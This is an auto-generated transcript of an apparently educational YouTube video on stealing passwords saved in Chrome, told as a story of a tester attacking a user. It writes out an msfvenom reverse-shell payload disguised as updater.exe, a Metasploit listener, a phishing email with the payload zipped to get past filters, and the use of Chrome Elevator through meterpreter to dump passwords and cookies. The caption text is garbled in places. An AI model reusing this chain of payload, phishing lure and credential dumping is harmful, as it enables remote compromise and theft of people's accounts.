How Hackers Hack Chrome Passwords — Transcript
Full transcript
- 0:03This is Sally. She's an artist who
- 0:05spends her days bringing beautiful
- 0:06landscapes to life on painting.
- 0:09But like most of us, she also lives a
- 0:11digital life.
- 0:12She checks emails, shops online, pays
- 0:15bills, and chats with friends, all
- 0:17through her trusted Windows laptop.
- 0:19Take today, for example.
- 0:21Sally wants to check her email.
- 0:23She opens her browser and navigates to
- 0:25ProtonMail, a service she chose
- 0:28specifically because she cares about
- 0:30privacy and security.
- 0:32She types her email,
- 0:33[email protected],
- 0:37then her password,
- 0:38mycat2027!@#.
- 0:43A strong password, uppercase, lowercase,
- 0:46numbers, special characters, all the
- 0:48good stuff.
- 0:50Sally smiles thinking, "No hacker will
- 0:52ever find this one."
- 0:54She clicks sign in,
- 0:56and boom, she's in.
- 0:58But then Chrome does what Chrome always
- 1:00does.
- 1:01A little prompt appears at the top of
- 1:03the screen.
- 1:04It asks to save the password and
- 1:05username for this website.
- 1:08Sally barely glances at it.
- 1:10She clicks save without a second
- 1:12thought.
- 1:14This is a cool Chrome feature.
- 1:16The next time she wants to log in, she
- 1:18won't have to type the password again.
- 1:20Then Sally visits her favorite online
- 1:22store, demoblaze.com.
- 1:25She clicks log in and enters her
- 1:27credentials.
- 1:29Her username is sally7780.
- 1:32And her password is coffee@42#.
- 1:35She clicks log in.
- 1:37Chrome asks again, "Save password for
- 1:39demoblaze.com?"
- 1:41She clicks save.
- 1:43It's convenient, right?
- 1:45The browser remembers for her.
- 1:48No more typing that long password every
- 1:49time.
- 1:51It's secure, she thinks.
- 1:53But here's the uncomfortable truth that
- 1:55Sally, and most people, don't realize.
- 1:58When you click save password in Chrome,
- 2:01Edge, or Firefox, you're not storing
- 2:03that password in some impenetrable
- 2:05vault.
- 2:07You're storing it in a file on your
- 2:08computer.
- 2:09It's encrypted, yes,
- 2:11>> [music]
- 2:11>> but the key to decrypt it is sitting
- 2:12right there on your machine tied to your
- 2:15Windows login.
- 2:16And if an attacker gains even remote
- 2:18access to your machine, that file
- 2:20becomes a treasure chest waiting to be
- 2:22opened.
- 2:22>> [music]
- 2:23>> Every password, every cookie, every
- 2:25saved credit card number will be
- 2:27exposed.
- 2:29And this is where Kim comes in.
- 2:31He is a penetration tester and ethical
- 2:34hacker.
- 2:35His role is to break into systems with
- 2:37permission, so he can show people like
- 2:39Sally where their security fails before
- 2:41the real criminals find it.
- 2:43Today, Kim isn't interested in Sally's
- 2:45art.
- 2:46He's interested in something far more
- 2:48valuable, her digital identity.
- 2:50Every password Sally has ever saved in
- 2:52her browser is like a key to her entire
- 2:54online life.
- 2:56Her email, her shopping accounts, maybe
- 2:58even her banking.
- 2:59And today, Kim is going to ethically
- 3:01steal every single one of them.
- 3:04Now, let's dive in and see how Kim
- 3:06steals Sally's password saved in Chrome.
- 3:09First, Kim needs a way in.
- 3:11He's going to create what's called a
- 3:12reverse shell payload.
- 3:15This is a small program that, when run
- 3:16on Sally's computer, reaches back out to
- 3:18Kim's machine and gives him remote
- 3:20access.
- 3:22To do so, Kim opens a terminal on his
- 3:24Kali Linux machine and types
- 3:26msfvenom -p
- 3:28windows/x64/meterpreter/reverse_tcp.
- 3:36This generates a 64-bit meterpreter
- 3:38reverse TCP payload, which can be used
- 3:40to establish a remote connection to a
- 3:42target system.
- 3:44Next, he needs to specify LHOST.
- 3:48This is the IP address of a machine he
- 3:49controls.
- 3:51This is where Sally's computer will
- 3:52connect back to.
- 3:54Kim opens a new terminal and types IPA
- 3:57to find his IP address.
- 3:59He sees 192.168.122.71
- 4:05and uses that as his LHOST value.
- 4:08Then comes LPORT.
- 4:10This is the port Kim's machine will
- 4:12listen on for the incoming connection.
- 4:14He chooses 4444,
- 4:16a common port for this type of attack.
- 4:19Finally, he adds -fx
- 4:22to specify the output format as a
- 4:24Windows executable.
- 4:26And -o updater.exe to name the file.
- 4:30And that's it.
- 4:31The full command is ready.
- 4:33When Kim presses enter, this will create
- 4:35updater.exe,
- 4:37a file that looks innocent, but will
- 4:39give Kim full remote access the moment
- 4:41Sally runs it.
- 4:43Kim presses enter.
- 4:45And just like that, he now has his
- 4:47weapon.
- 4:48Now he just needs Sally to run it.
- 4:51He'll email it to her.
- 4:53When Sally clicks it, it will open a
- 4:54tunnel back to Kim.
- 4:56But how does Kim hear it?
- 4:58He needs to be listening for that
- 4:59connection, waiting for Sally to click.
- 5:02To do so, he uses the Metasploit
- 5:04Framework console.
- 5:06He fires it up and the Metasploit
- 5:07console loads up.
- 5:09Now Kim needs to configure the listener.
- 5:11Think of it like setting up a
- 5:12walkie-talkie on the right channel.
- 5:15He types use exploit/multi/handler.
- 5:18This command tells Metasploit to
- 5:19activate a module designed to catch
- 5:21incoming connections.
- 5:24Essentially, it turns his machine into a
- 5:26receiver.
- 5:27Next, he types set payload
- 5:29windows/x64/meterpreter/reverse_tcp.
- 5:35This tells the receiver exactly what
- 5:37kind of signal to expect.
- 5:39It has to match the payload he built
- 5:41into updater.exe, like making sure two
- 5:43walkie-talkies are on the same
- 5:45frequency.
- 5:47Then he sets his IP address with set
- 5:49LHOST 192.168.122.71.
- 5:56This tells the listener which network
- 5:57door to watch.
- 5:59He sets the port with set LPORT 4444.
- 6:03Think of this as the specific channel on
- 6:05the walkie-talkie.
- 6:06Finally, he types exploit.
- 6:09This activates the listener.
- 6:11The terminal responds, started reverse
- 6:13TCP handler on 192.168.1.105:4444.
- 6:21Kim sits back waiting.
- 6:23The trap is set.
- 6:24Now he just needs Sally to take the
- 6:26bait.
- 6:28Now he can craft an email to Sally which
- 6:29contains the payload.
- 6:31The email reads, "Dear user, [music] we
- 6:34have detected that your system is out of
- 6:35date and requires an immediate security
- 6:37update.
- 6:39To complete this update, please download
- 6:41the attached file and run the update
- 6:42installer on your device.
- 6:44The update will only take a few minutes
- 6:46to install.
- 6:47This update is essential for the
- 6:49continued performance and security of
- 6:50your system.
- 6:52Best regards,
- 6:53support team."
- 6:56Now comes the final and most important
- 6:57piece.
- 6:59Kim needs to attach the updater.x file
- 7:01to the email.
- 7:03But there's a problem. Most email
- 7:05providers block .x files outright.
- 7:08They know executables are dangerous.
- 7:11So Kim will zip it before sending.
- 7:13Zipping does two things. It compresses
- 7:15the file, but more importantly, it wraps
- 7:17the .x inside a container that looks
- 7:19less suspicious to email filters.
- 7:21To zip the file, Kim goes back to his
- 7:23terminal and types zip updater.zip
- 7:26updater.x.
- 7:29This command takes his updater.x file
- 7:31and packages it into a new file called
- 7:33updater.zip.
- 7:35Kim presses enter.
- 7:37The zip file is created.
- 7:39His fishing email is ready to go.
- 7:42Now he can go back to ProtonMail and
- 7:44attach the zip file.
- 7:45He clicks the attachments icon
- 7:48and select the updater.zip file.
- 7:50And voila.
- 7:52The phishing mail is now complete.
- 7:55He clicks send.
- 7:57After a few seconds,
- 7:59the email is on its way to Sally.
- 8:01Now all it takes is one click from Sally
- 8:04and he's in.
- 8:06Meanwhile, Sally checks her email.
- 8:08There's a message from what looks like
- 8:09the Windows support team.
- 8:11The subject line warns of a critical
- 8:13update.
- 8:14The email says she must run the
- 8:15attachment immediately to protect her
- 8:17computer.
- 8:18She doesn't think twice.
- 8:20She downloads the file,
- 8:23opens it,
- 8:25then extracts the zip.
- 8:28And there it is, the updater.exe Trojan
- 8:31Kim center.
- 8:33It disguises itself as something
- 8:34legitimate while hiding its true
- 8:35purpose.
- 8:37Sally double clicks it thinking it's a
- 8:39genuine security update from Microsoft.
- 8:42Nothing seems to happen.
- 8:44But in reality, something huge just
- 8:47happened behind the scenes.
- 8:49On Kim's screen, the terminal explodes
- 8:52with activity.
- 8:53Sally's computer has reached out across
- 8:55the internet connecting back to Kim's
- 8:57machine.
- 8:59The tunnel is now open.
- 9:01Sally's computer is no longer just hers,
- 9:03it's theirs.
- 9:05Kim's screen outputs
- 9:07meterpreter session one opened.
- 9:10Boom.
- 9:11Kim is in.
- 9:12He now has a meterpreter shell on
- 9:14Sally's Windows machine.
- 9:16This isn't just a command prompt. This
- 9:18is one of the most powerful
- 9:20post-exploitation tools in existence.
- 9:23Now that Kim has access, he needs to get
- 9:25his bearings.
- 9:26First, he checks what user he's running
- 9:28as.
- 9:30To do so, he types get UID.
- 9:34The output is server username desktop
- 9:37backslash Sally.
- 9:39The tells Kim he's running as Sally
- 9:41herself, meaning he has all the access
- 9:43Sally has.
- 9:45Next, he checks what system he's on
- 9:47using the sysinfo command.
- 9:49He can see that Sally's machine is
- 9:51running Windows 10 with a 64-bit
- 9:53architecture.
- 9:54Now, here's where things get
- 9:55interesting.
- 9:57Since Kim is already logged in as Sally
- 9:59through the meterpreter session he
- 10:01established, he could manually locate
- 10:03the file containing Sally's encrypted
- 10:05Chrome passwords, find the decryption
- 10:07key, which as explained earlier is tied
- 10:10to her Windows user account, and write
- 10:12custom scripts to decrypt the passwords.
- 10:16But such a process is also tedious,
- 10:18time-consuming, and error-prone.
- 10:20In fact, why bother reinventing the
- 10:22wheel when there's a tool built
- 10:23specifically for this?
- 10:25This tool is called Chrome Elevator.
- 10:28Chrome Elevator is a modern open-source
- 10:30tool designed for one purpose,
- 10:32extracting stored passwords from a
- 10:34compromised machine.
- 10:36It pulls passwords, cookies, credit
- 10:38cards, and session tokens automatically.
- 10:41First, Kim needs to get Chrome Elevator
- 10:43onto Sally's machine.
- 10:44To do [music] so, he first downloads it.
- 10:47He goes back to his browser and searches
- 10:49for Chrome Elevator.
- 10:50The first result is the official GitHub
- 10:52page. He clicks it.
- 10:54A GitHub page for the Chrome Elevator
- 10:56project opens.
- 10:58On that page, he looks for the releases
- 11:00section
- 11:01and opens the release page.
- 11:03There, he scrolls down and finds the
- 11:05chrome-dash-injector.zip
- 11:07file.
- 11:08This is the file containing the tool
- 11:10that will decrypt Sally's passwords.
- 11:13He downloads it.
- 11:14Then he navigates to his downloads
- 11:16folder to verify the download.
- 11:18As you can see in his downloads folder,
- 11:20there's a new file, chrome-injector.zip.
- 11:23He unzips it using the unzip command.
- 11:26And there it is.
- 11:28He gets two new files,
- 11:30chrome-elevator-x64.x
- 11:32for 64-bit systems and Chrome Elevator
- 11:35arm64.x for arm64-based devices.
- 11:40Chrome Elevator x64.x is the one Kim
- 11:43needs since he confirmed earlier with
- 11:45the sysinfo command that Sally's machine
- 11:47is running 64-bit architecture.
- 11:50Now that he has the file, he can upload
- 11:52it directly to Sally's machine through
- 11:53meterpreter.
- 11:55To do so, he types the command upload
- 11:57followed by the path to the Chrome
- 11:59Elevator x64.x file.
- 12:02Then specifies the destination path on
- 12:04Sally's machine where he wants to upload
- 12:06the file, which is the temp directory, a
- 12:08common hiding spot that doesn't raise
- 12:10alarms.
- 12:11He hits enter.
- 12:13And voila, the upload is complete.
- 12:16Now that Chrome Elevator x64.exe
- 12:19is on Sally's machine, Kim needs to
- 12:21execute it there.
- 12:23To do so, he needs a standard Windows
- 12:25command shell on Sally's computer.
- 12:28That's exactly what the shell command
- 12:29provides.
- 12:31He types shell and presses enter.
- 12:34Instantly, he's dropped into Sally's
- 12:36command prompt.
- 12:37Once in the shell, he can use standard
- 12:39Windows command.
- 12:40For example, he can use the change
- 12:42directory command to navigate to Sally's
- 12:44temp folder.
- 12:45Remember, this is where he uploaded the
- 12:47Chrome Elevator.x file.
- 12:50Now that Kim is in Sally's temp folder,
- 12:52he can use the dir command to list the
- 12:54contents and verify that the Chrome
- 12:56Elevator executable actually landed
- 12:58there. And voila,
- 13:00the file is there.
- 13:02The upload succeeded.
- 13:04The tool is ready.
- 13:06Now all Kim needs is to execute it.
- 13:09To execute Chrome Elevator, Kim types
- 13:11Chrome Elevator x64.x
- 13:13chrome-o sallydata.
- 13:16Let's break down what this command does.
- 13:18Chrome Elevator x64.x is the exact name
- 13:21of the Chrome Elevator executable Kim
- 13:23uploaded to Sally's machine.
- 13:25Chrome tells Chrome Elevator to target
- 13:27Chrome specifically rather than Firefox
- 13:29or brave for example.
- 13:31Dash o Sally data specifies the output
- 13:33directory where results will be saved.
- 13:36Sally data is the folder name.
- 13:38This is where the extracted data will
- 13:40land.
- 13:42Kim presses enter.
- 13:44For a few seconds the tool does its
- 13:45magic.
- 13:47Injecting into Chrome's process,
- 13:49bypassing encryption, and pulling out
- 13:51everything Sally has ever saved.
- 13:53Then boom.
- 13:55The results appear. 18 cookies and two
- 13:57passwords found.
- 13:58>> [music]
- 13:59>> Sally's digital life now neatly packaged
- 14:01and waiting for Kim to explore.
- 14:04Looking closer we can see that Chrome
- 14:05lovator automatically saved the results
- 14:07in a new folder called Chrome located
- 14:10inside Sally data folder.
- 14:12Before Kim navigates to Sally's data, he
- 14:14first types exit to leave the window
- 14:16shell and return to meter preeder.
- 14:18This is because the window shell is
- 14:20limited.
- 14:21Meter preeder offers a much richer set
- 14:23of file commands.
- 14:25For example, the PWD command which
- 14:27reveals the current working directory in
- 14:29a much cleaner and more consistent way
- 14:31than the window shell.
- 14:33As Kim navigates to Sally's data, he
- 14:36spots the Chrome folder created by
- 14:38Chrome lovator.
- 14:39He enters it.
- 14:40Inside he finds a folder named default.
- 14:44This is the default Chrome profile on
- 14:45Sally's machine.
- 14:47Kim digs deeper.
- 14:48A quick LS command reveals what he's
- 14:50after. Two files, cookies.json and
- 14:53passwords.json.
- 14:56Everything Sally trusted Chrome to keep
- 14:57safe is now sitting in these two files.
- 15:01And Kim has full access.
- 15:03He runs the cat command to open the
- 15:05passwords.json file.
- 15:07And there it is. Sally's credentials
- 15:09exposed.
- 15:11Kim can see the URLs of the websites for
- 15:13which Chrome saved passwords along with
- 15:15the matching usernames and the passwords
- 15:18themselves in plain text.
- 15:20The very password Sally thought was safe
- 15:22are now right on Kim's screen, ready to
- 15:25be exploited.
- 15:27And that's it for today.
- 15:28If you enjoyed this video, give it a
- 15:30thumbs up, subscribe for more, and don't
- 15:32save passwords in browsers. Bye-bye.
About this transcript
This page contains the full transcript of How Hackers Hack Chrome Passwords by Neurix, generated from the public captions YouTube serves with the video. The transcript has 2,213 words across 445 segments, with the original timestamps preserved so you can click any line to jump to that moment in the embedded player.
What you can do with it
Use the transcript to take notes, quote the speaker, build a study guide, generate a summary with ChatGPT or Claude via the YouTube Summary tool, or export it as a timed subtitle file with YouTube to SRT. You can also re-open it in the transcriber to translate the transcript into 100+ languages.
Free YouTube transcript tool
YouTube2Text is a free YouTube transcript generator — no signup, no daily limit. Paste any YouTube link and get the full transcript instantly, with timestamps, click-to-jump, translation to 100+ languages, AI prompts for ChatGPT, Claude, and Gemini, and exports to TXT, SRT, VTT, or Markdown.